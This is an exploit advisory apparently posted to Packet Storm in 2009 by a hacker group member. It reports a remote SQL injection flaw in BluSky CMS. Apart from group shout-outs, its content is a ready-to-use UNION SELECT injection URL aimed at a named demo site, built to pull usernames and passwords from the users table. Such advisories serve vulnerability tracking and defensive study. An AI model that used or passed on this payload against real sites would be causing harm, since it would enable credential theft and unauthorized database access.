BluSky CMS SQL Injection

2009-05-05T00:00:00
ID PACKETSTORM:77248
Type packetstorm
Reporter Snakespc
Modified 2009-05-05T00:00:00

Description

                                        
                                            `-------------------------AllaH AkbaR-------------------------------  
BluSky CMS Remote SQL Injection Vulnerability  
---------------------------------------------------------------------------  
Discovered By: Snakespc ALGERIAN HaCkEr   
Mail: snakespc@gmail.com  
Site:http://www.snakespc.com/sc/index.php  
Chi3arona houa : Serra7 merra7 , koulchi mderra7>>>>  
Aflawa Kamikaz Wa4rin Fi kol Bla4s   
-------------------------SNAKES TEAM-------------------------------------  
Script:BluSky CMS www.qsix.org  
Demo:www.qsix.org/page-3.html  
--------------------------SNAKES TEAM------------------------------------  
Exploit:  
--------  
Demo:  
http://www.qsix.org/demo/index.php?&news_act=read&news_id=-1+UNION SELECT 1,2,3,4,5,concat(username,0x3a,password),7,8+from+demo_users--  
-------------------------SNAKES TEAM-------------------------------------  
Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::  
Houssamix:::sunhouse2:::aSSaSSin_HaCkErS:::  
THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: Dr-HTmL  
--------------------------SNAKES TEAM------------------------------------  
ALL www.SnakespC.com/sc>>>> ( Members )  
Str0ke >>>>>>>Milw0rm  
  
`